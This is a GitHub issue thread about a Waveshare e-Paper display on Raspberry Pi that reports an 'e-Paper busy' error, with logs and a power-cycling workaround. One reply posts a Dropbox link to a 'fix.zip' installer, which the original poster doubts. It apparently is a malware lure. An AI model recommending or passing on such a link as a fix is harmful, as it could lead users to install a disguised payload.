waveshareteam/e-Paper #357: Display does not work, receive a waveshare_epd.epd2in7_V2:e-Paper busy error

emilyboda, 2024-08-26:
I have followed all installation instructions on [the website](https://www.waveshare.com/wiki/2.7inch_e-Paper_HAT_Manual) and I'm getting a display busy error. I have tried the same display with both a Raspberry Pi 2B and a Pi Zero and get the same result. I have enabled SPI (and checked that it's enabled in /boot/config.txt). I checked the SPI is not used by any other services. 

I am using a 2.7Inch e-Paper display (Rev2.1) directly connected to the 40-pin header on my Pi.

```
pi@inkycal:~/e-Paper/RaspberryPi_JetsonNano/python/examples $ python3 epd_2in7_V2_test.py
INFO:root:epd2in7 Demo
INFO:root:init and Clear
DEBUG:waveshare_epd.epd2in7_V2:e-Paper busy
```

Is there a solution for this problem?

Wanderx13, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

emilyboda, 2024-08-26:
That link does not work. Also can someone confirm that this is legit before I download something from a random website onto my computer?

emilyboda, 2024-08-27:
As an update, I have both the 4-button 4.2 inch screen and the no button 4.2 inch screen. I'm attempting to run any of the examples on my raspberry pi. I've tried running it with python and I get a "busy" error message. I've also tried compiling the examples in C and I get the same error message:

```
pi@buddylistpi:~/e-Paper/RaspberryPi_JetsonNano/c $ sudo ./epd 
EPD_4IN2_V2_test Demo
/***********************************/ 
Current environment: Raspbian
/***********************************/ 
e-Paper Init and Clear...
Debug: e-Paper busy
```

It looks like this has been going on for several months. Is there a fix?

emilyboda, 2024-08-28:
I have tried a fresh install on the version of raspbian OS that the docs say has been tested with the instructions (https://downloads.raspberrypi.org/raspbian_full/images/raspbian_full-2019-04-09/2019-04-08-raspbian-stretch-full.zip)

I'm still getting the same error: 

```
pi@raspberrypi:~/e-Paper/RaspberryPi_JetsonNano/python/examples $ python3 epd_4in2_V2_test.py 
INFO:root:epd4in2 Demo
INFO:root:init and Clear
DEBUG:waveshare_epd.epd4in2_V2:e-Paper busy
```

CaptainCuddleCube, 2024-12-20:
Have you tried using `python3 epd_4in2_test.py`?

pad0815, 2025-01-16:
Hi, 

i have the same error on 2.7Inch e-Paper display (Rev2.1) with epd_2in7_V2_test.py, but the display is working with v1:

> epd_2in7_test.py 

`~/e-Paper_Py/RaspberryPi_JetsonNano/python/examples $ python3 epd_2in7_test.py 
INFO:root:epd2in7 Demo
INFO:root:init and Clear
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:1.Drawing on the Horizontal image...
DEBUG:waveshare_epd.epd2in7:Horizontal
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:2.Drawing on the Vertical image...
DEBUG:waveshare_epd.epd2in7:Vertical
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:3.read bmp file
DEBUG:waveshare_epd.epd2in7:Vertical
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:4.read bmp file on window
DEBUG:waveshare_epd.epd2in7:Horizontal
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:4Gray display--------------------------------
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
DEBUG:waveshare_epd.epd2in7:Vertical
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
DEBUG:waveshare_epd.epd2in7:Vertical
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:Clear...
DEBUG:waveshare_epd.epd2in7:e-Paper busy
DEBUG:waveshare_epd.epd2in7:e-Paper busy release
INFO:root:Goto Sleep...
DEBUG:waveshare_epd.epdconfig:spi end
DEBUG:waveshare_epd.epdconfig:close 5V, Module enters 0 power consumption ...`

I also get the "busy" warning, but the display is working (i follow the instruction from here https://www.waveshare.com/wiki/2.7inch_e-Paper_HAT_Manual#Introduction) 

Greeting!

maddocker, 2025-02-20:
I have had the same issue after having this display running for some time. I have the `waveshare-epaper` package installed via pip on version 1.3.0 and I randomly started experiencing this issue. It is demoralizing after the amount of work I've put into this project that these type of issues can spring up, and I agree with the previous comment that it makes me want to look at other display manufacturers.

I think I saw somewhere that it may be due to `gpiozero` closing its own pin connections automatically while the existing `waveshare-epaper` implementation still attempts to close first, leading to a conflict that causes this busy message. When I get some more time and inclination, I might try to investigate more.

maddocker, 2025-03-07:
As an update, I have done a lot of fiddling with my display in configuration and investigating the Python setup (using this master repo, NOT the outdated/misrepresented `waveshare-epaper` package through `pip`). I will be forking this repository to bring my interpretation of a correct setup, however, I did notice that I still received this "busy" error on the example script when everything should have been correct. Once I performed the following steps, I was able to get the example to work, presumably because it forces some hardware reset:

1. Power off Raspberry Pi
2. Unplug power source from Pi
3. Unplug display cable connector from display
4. Wait a few seconds
5. Plug in display connector
6. Plug in Pi power source

Simply rebooting the Pi did not seem to release the GPIO pins once they were "busy" without an attached process.